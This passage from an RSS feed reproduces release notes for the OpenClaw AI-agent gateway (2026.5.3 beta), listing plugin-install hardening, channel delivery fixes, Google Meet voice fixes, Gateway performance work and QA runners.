<p>Memory-core: treat exhausted file watcher limits as non-fatal for builtin memory auto-sync while preserving fatal handling for unrelated disk-full errors. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341250108" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73357" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73357/hovercard" href="https://github.com/openclaw/openclaw/pull/73357">#73357</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solodmd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solodmd">@solodmd</a>.</p>
</li>
<li>
<p>Providers/Ollama: restore catalog context-window forwarding as <code>num_ctx</code> for native <code>/api/chat</code> requests; fixes tool selection and context truncation regressions on models with catalog entries (qwen3, llama3, gemma3, …) when no explicit <code>params.num_ctx</code> was configured. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369209198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76117" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76117/hovercard" href="https://github.com/openclaw/openclaw/issues/76117">#76117</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369585251" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76181" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76181/hovercard" href="https://github.com/openclaw/openclaw/pull/76181">#76181</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</p>
</li>
<li>
<p>Plugins/install: pin npm plugin installs to the verified resolved version and reject package-lock version or integrity drift, so mutable tags cannot race integrity checks into accepting a different artifact. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</p>
</li>
<li>
<p>Plugins/providers: preserve scoped cold-load fallback for enabled external manifest-contract capability providers missing from the startup registry, so providers such as Fish Audio can resolve on request without requiring <code>activation.onStartup</code> for correctness. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371180492" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76536" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76536/hovercard" href="https://github.com/openclaw/openclaw/pull/76536">#76536</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Conan-Scott/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Conan-Scott">@Conan-Scott</a>.</p>
</li>
<li>
<p>Gateway/update: carry <code>continuationMessage</code> from <code>update.run</code> into successful restart sentinels so session-scoped self-updates can resume one follow-up turn after the Gateway restarts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324435284" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71178" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71178/hovercard" href="https://github.com/openclaw/openclaw/issues/71178">#71178</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350993039" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74362" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74362/hovercard" href="https://github.com/openclaw/openclaw/pull/74362">#74362</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100menotu001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100menotu001">@100menotu001</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HeilbronAILabs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HeilbronAILabs">@HeilbronAILabs</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/artnking/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/artnking">@artnking</a>.</p>
</li>
<li>
<p>Agents/fallback: suppress duplicate current-turn user-message transcript writes after embedded fallback retries while still sending the retry prompt to the model. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231528900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63696" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63696/hovercard" href="https://github.com/openclaw/openclaw/pull/63696">#63696</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dashhuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dashhuang">@dashhuang</a>.</p>
</li>
<li>
<p>Channels/Telegram: force a fresh final message when a visible non-preview bubble (tool/block/error) was delivered after the active answer preview, so multi-step assistant replies no longer end up with the final answer above intermediate output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371163135" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76529" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76529/hovercard" href="https://github.com/openclaw/openclaw/issues/76529">#76529</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jack-stormentswe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jack-stormentswe">@jack-stormentswe</a>.</p>
</li>
<li>
<p>Channels/Telegram: require an observed Telegram send, edit, or fallback before treating a forum-topic final as delivered, so final replies generated in transcript no longer disappear from Telegram topics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371235088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76554" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76554/hovercard" href="https://github.com/openclaw/openclaw/issues/76554">#76554</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372160301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76764" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76764/hovercard" href="https://github.com/openclaw/openclaw/pull/76764">#76764</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bubucilo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bubucilo">@bubucilo</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</p>
</li>
<li>
<p>Plugins/update: keep externalized bundled npm bridge updates on the normal plugin security scanner path instead of granting source-linked official trust without artifact provenance. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372163499" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76765/hovercard" href="https://github.com/openclaw/openclaw/pull/76765">#76765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</p>
</li>
<li>
<p>Agents/reply context: label replied-to messages as the current user message target in model-visible metadata, so short replies are grounded to their explicit reply target instead of nearby chat history. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372371547" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76817" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76817/hovercard" href="https://github.com/openclaw/openclaw/pull/76817">#76817</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</p>
</li>
<li>
<p>Doctor/plugins: install configured missing official plugins such as Discord and Brave during doctor/update repair, auto-enable repaired provider plugins, preserve config when a download fails, and stop auto-enable from inventing plugin entries when no manifest declares a configured channel. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372587442" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76872" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76872/hovercard" href="https://github.com/openclaw/openclaw/issues/76872">#76872</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jack-stormentswe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jack-stormentswe">@jack-stormentswe</a>.</p>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.3-beta.3]]></title>
<description><![CDATA[2026.5.3
Highlights

Plugins/file-transfer: add bundled file-transfer plugin with file_fetch, dir_list, dir_fetch, and file_write agent tools for binary file ops on paired nodes; default-deny per-node path policy under plugins.entries.file-transfer.config.nodes with operator approval, symlink tra...]]></description>
<link>https://tsecurity.de/de/3484805/downloads/openclaw-202653-beta3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3484805/downloads/openclaw-202653-beta3/</guid>
<pubDate>Mon, 04 May 2026 04:30:48 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.3</h2>
<h3>Highlights</h3>
<ul>
<li>Plugins/file-transfer: add bundled file-transfer plugin with <code>file_fetch</code>, <code>dir_list</code>, <code>dir_fetch</code>, and <code>file_write</code> agent tools for binary file ops on paired nodes; default-deny per-node path policy under <code>plugins.entries.file-transfer.config.nodes</code> with operator approval, symlink traversal refused by default (opt-in <code>followSymlinks</code>), and a 16 MB byte ceiling per round-trip. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354792250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74742" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74742/hovercard" href="https://github.com/openclaw/openclaw/pull/74742">#74742</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omarshahine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omarshahine">@omarshahine</a>.</li>
<li>Plugins/install: harden official plugin install, uninstall, update, onboarding, ClawHub fallback, npm dependency-state reporting, and beta-channel update paths so externalized plugins behave like first-class package installs.</li>
<li>Gateway/performance: trim startup and Control UI hot paths by lazy-loading plugin/runtime discovery, cron, schema, shutdown, sessions, and model metadata work only when needed.</li>
<li>Channels/replies: improve Discord status reactions and degraded transport reporting, add WhatsApp Channel/Newsletter targets, and tighten Telegram, Feishu, Matrix, Microsoft Teams, and Slack delivery/recovery behavior.</li>
<li>Install/update: recover broken macOS LaunchAgent upgrades, reject source-only plugin packages before runtime load, and repair stale Gateway/plugin state during updates and doctor runs.</li>
<li>Agent/runtime reliability: preserve streamed provider replies, delayed A2A session replies, prompt/tool delivery, memory recall, web search provider discovery, and provider-specific thinking/model metadata across common edge cases.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Channels/streaming: add unified <code>streaming.mode: "progress"</code> drafts with auto single-word status labels and shared progress configuration across Discord, Telegram, Matrix, Slack, and Microsoft Teams.</li>
<li>Agents/commands: add <code>/steer &lt;message&gt;</code> for queue-independent steering of the active current-session run without starting a new turn when the session is idle. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372960326" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76934" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76934/hovercard" href="https://github.com/openclaw/openclaw/pull/76934">#76934</a>)</li>
<li>Tools/BTW: add <code>/side</code> as a text and native slash-command alias for <code>/btw</code> side questions.</li>
<li>Doctor/config: <code>doctor --fix</code> now commits safe legacy migrations even when unrelated validation issues (e.g. a missing plugin) prevent full validation from passing, so <code>agents.defaults.llm</code> and other known-legacy keys are always cleaned up by <code>doctor --fix</code> regardless of other config problems. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372284670" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76798" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76798/hovercard" href="https://github.com/openclaw/openclaw/issues/76798">#76798</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372297549" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76800" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76800/hovercard" href="https://github.com/openclaw/openclaw/pull/76800">#76800</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Agents/tools: skip optional media and PDF tool factories when the effective tool denylist already blocks them, avoiding unnecessary hot-path setup for tools that will be filtered out before model use. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372183833" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76773/hovercard" href="https://github.com/openclaw/openclaw/pull/76773">#76773</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dorukardahan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dorukardahan">@dorukardahan</a>.</li>
<li>Discord/status: let explicit reaction tool calls opt into tracking subsequent tool progress on the reacted message with <code>trackToolCalls: true</code>, and use the shared tool display emoji table for status reactions.</li>
<li>Gateway/config: stop Gateway startup and hot reload from auto-restoring invalid config; invalid config now fails closed and <code>openclaw doctor --fix</code> owns last-known-good repair.</li>
<li>Gateway/performance: lazy-load early runtime discovery and shutdown-hook helpers, defer maintenance timers until after readiness, and trim duplicate plugin auto-enable work during Gateway startup.</li>
<li>QA/Mantis: add a <code>pnpm openclaw qa mantis discord-smoke</code> runner and manual GitHub workflow that verify the Mantis Discord bot can see the configured guild/channel, post a smoke message, add a reaction, and upload artifacts.</li>
<li>QA/Slack: add a Slack live transport QA runner with canary and mention-gating coverage for the private bot-to-bot harness. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/onboarding: let Manual setup install optional official plugins, including ClawHub-backed diagnostics with npm fallback, and expose the external Codex plugin as a selectable provider setup choice. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI/update: include package dependency install state in <code>openclaw plugins list --json</code>, trust official externalized npm migrations, clean stale bundled load paths for externalized installs, try plugin <code>@beta</code> updates first on the beta OpenClaw channel, and fall back to default/latest when no plugin beta release exists.</li>
<li>Plugins/ClawHub: annotate 429 errors with reset windows and unauthenticated higher-rate-limit hints, so operators can tell when downloads recover and when signing in helps. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>Gateway/performance: lazy-load early runtime discovery, shutdown hooks, cron, channel-config schema metadata, restart sentinels, and maintenance timers after readiness; trim duplicate plugin auto-enable work and add startup CPU/profile controls.</li>
<li>Gateway/config: stop Gateway startup and hot reload from auto-restoring invalid config; invalid config now fails closed and <code>openclaw doctor --fix</code> owns last-known-good repair.</li>
<li>Discord/status: let explicit reaction tool calls opt into tracking later tool progress with <code>trackToolCalls: true</code>, share tool display emoji mapping, and surface degraded Discord transport or gateway event-loop starvation in status output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370424830" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76327" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76327/hovercard" href="https://github.com/openclaw/openclaw/pull/76327">#76327</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Channels/WhatsApp: support explicit WhatsApp Channel/Newsletter <code>@newsletter</code> outbound message targets with channel session metadata instead of DM routing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3921599881" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/13417" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/13417/hovercard" href="https://github.com/openclaw/openclaw/issues/13417">#13417</a>; carries forward the narrow outbound target idea from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3921655588" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/13424" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/13424/hovercard" href="https://github.com/openclaw/openclaw/pull/13424">#13424</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/agentz-manfred/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/agentz-manfred">@agentz-manfred</a>.</li>
<li>Agents/tools: skip optional media and PDF tool factories when the effective tool denylist already blocks them, avoiding unnecessary hot-path setup for tools that will be filtered out before model use. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372183833" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76773/hovercard" href="https://github.com/openclaw/openclaw/pull/76773">#76773</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dorukardahan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dorukardahan">@dorukardahan</a>.</li>
<li>Agents/sandbox: store sandbox container and browser registry entries as per-runtime shard files, reducing unrelated session lock contention while <code>openclaw doctor --fix</code> migrates legacy monolithic registry files. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355267442" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74831" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74831/hovercard" href="https://github.com/openclaw/openclaw/pull/74831">#74831</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luckylhb90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luckylhb90">@luckylhb90</a>.</li>
<li>Tools/BTW: add <code>/side</code> as a text and native slash-command alias for <code>/btw</code> side questions.</li>
<li>Exec approvals: add a tree-sitter-backed shell command explainer for future approval and command-review surfaces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356957695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75004" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75004/hovercard" href="https://github.com/openclaw/openclaw/pull/75004">#75004</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
<li>QA/Mantis: add a <code>pnpm openclaw qa mantis discord-smoke</code> runner and manual GitHub workflow that verify the Mantis Discord bot can see the configured guild/channel, post a smoke message, add a reaction, and upload artifacts.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>
<p>Channels/WhatsApp: allow <code>@whiskeysockets/libsignal-node</code> in <code>onlyBuiltDependencies</code> so pnpm v9+ <code>blockExoticSubdeps</code> no longer rejects the baileys git-tarball subdep and silences all inbound agent replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371187256" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76539" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76539/hovercard" href="https://github.com/openclaw/openclaw/issues/76539">#76539</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/systemd: preserve operator-added secrets in the Gateway env file across re-stage while clearing OpenClaw-managed keys (such as <code>OPENCLAW_GATEWAY_TOKEN</code>) so a fresh staging value is never shadowed by a stale env-file copy; operator secrets are also retained when the state-dir <code>.env</code> is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372544865" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76860" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76860/hovercard" href="https://github.com/openclaw/openclaw/issues/76860">#76860</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Plugin updates: do not short-circuit trusted official npm updates as unchanged when the default/latest spec still resolves to an already-installed prerelease that the installer should replace with a stable fallback. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugin tools: keep auth-unavailable optional tools hidden even when another default tool from the same plugin is available and <code>tools.alsoAllow</code> names the optional tool. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Realtime transcription: report socket closes before provider readiness as closed-before-ready failures instead of mislabeling them as connection timeouts for OpenAI, xAI, and Deepgram streaming transcription. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>OpenAI/Google Meet: fail realtime voice connection attempts when the socket closes before <code>session.updated</code>, avoiding stuck Meet joins waiting on a bridge that never became ready. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>QA/cache: require the full <code>CACHE-OK &lt;suffix&gt;</code> marker before live cache probes stop retrying, so suffix-only prose cannot hide a broken probe response. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Slack/Matrix: avoid creating blank progress-draft messages when <code>streaming.progress.label=false</code> and progress tool lines are disabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>QA/Matrix: keep the mock OpenAI tool-progress provider aligned with exact-marker Matrix prompts so the hardened live preview scenario still forces a deterministic read before final delivery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>OpenAI/Google Meet: wait for realtime voice <code>session.updated</code> before treating the bridge as connected, so Meet joins do not return with audio queued behind an unconfigured realtime session. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/catalog: merge official external catalog descriptors into partial package channel config metadata, so lagging WeCom/Yuanbao manifests keep their own schema while still exposing host-supplied labels and setup text. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/catalog: supplement lagging official external WeCom and Yuanbao npm manifests with channel config descriptors and declared tool contracts from the OpenClaw catalog, so trusted package sweeps no longer fail because external package metadata trails the host contract. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/install: let trusted official <code>@openclaw/*</code> catalog installs recover when npm <code>latest</code> points at a prerelease by falling back to the newest stable version, or by selecting the newest exact prerelease for prerelease-only launch packages with a warning instead of making beta/development plugin sweeps fail at install time. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Google Meet: grant Chrome media permissions against the actual Meet tab, start the local realtime audio bridge only after Meet joins, expose realtime transcripts in status/logs, and force explicit audio responses with current OpenAI realtime output-audio events so BlackHole capture does not keep the OpenClaw participant muted or silent.</p>
</li>
<li>
<p>Memory/LanceDB: declare <code>apache-arrow</code> in the bundled memory plugin package so LanceDB installs include its runtime peer. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372798421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76910" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76910/hovercard" href="https://github.com/openclaw/openclaw/issues/76910">#76910</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/afiqfiles-max/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/afiqfiles-max">@afiqfiles-max</a>.</p>
</li>
<li>
<p>CLI/devices: retry explicit device-pair approval with <code>operator.admin</code> after a pairing-scope ownership denial, so existing admin-capable paired-device tokens can recover new Control UI/browser pairing after upgrades instead of requiring manual JSON edits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373068828" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76956/hovercard" href="https://github.com/openclaw/openclaw/issues/76956">#76956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neo19482/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neo19482">@neo19482</a>.</p>
</li>
<li>
<p>Google Meet: use the local call-control microphone button instead of disabled remote participant mute buttons, and block realtime speech when the OpenClaw Meet microphone remains muted.</p>
</li>
<li>
<p>Google Meet: refresh realtime browser state during status and retry delayed speech after Meet finishes joining, so a just-opened in-call tab no longer leaves speech stuck behind stale <code>not-in-call</code> health.</p>
</li>
<li>
<p>Plugins/install: recover the install ledger from the managed npm root when <code>plugins/installs.json</code> is empty or partial, so reinstalling Discord and Codex no longer makes the other installed plugin disappear.</p>
</li>
<li>
<p>Google Meet: grant Meet media permissions through the Playwright browser context when CDP grants do not affect the attached Chrome page, and report in-call microphone/speaker permission problems instead of marking realtime speech ready.</p>
</li>
<li>
<p>QA/Slack: fail the live mention-gating scenario on any unexpected SUT reply, even when the reply does not echo the expected marker. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>QA/Matrix: steer the live tool-progress preview check away from <code>HEARTBEAT.md</code> and report final preview candidates when the live marker reply misses the exact token. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>QA/Matrix: let the live tool-progress preview check verify progress replacement events without depending on the preview saying <code>Working</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
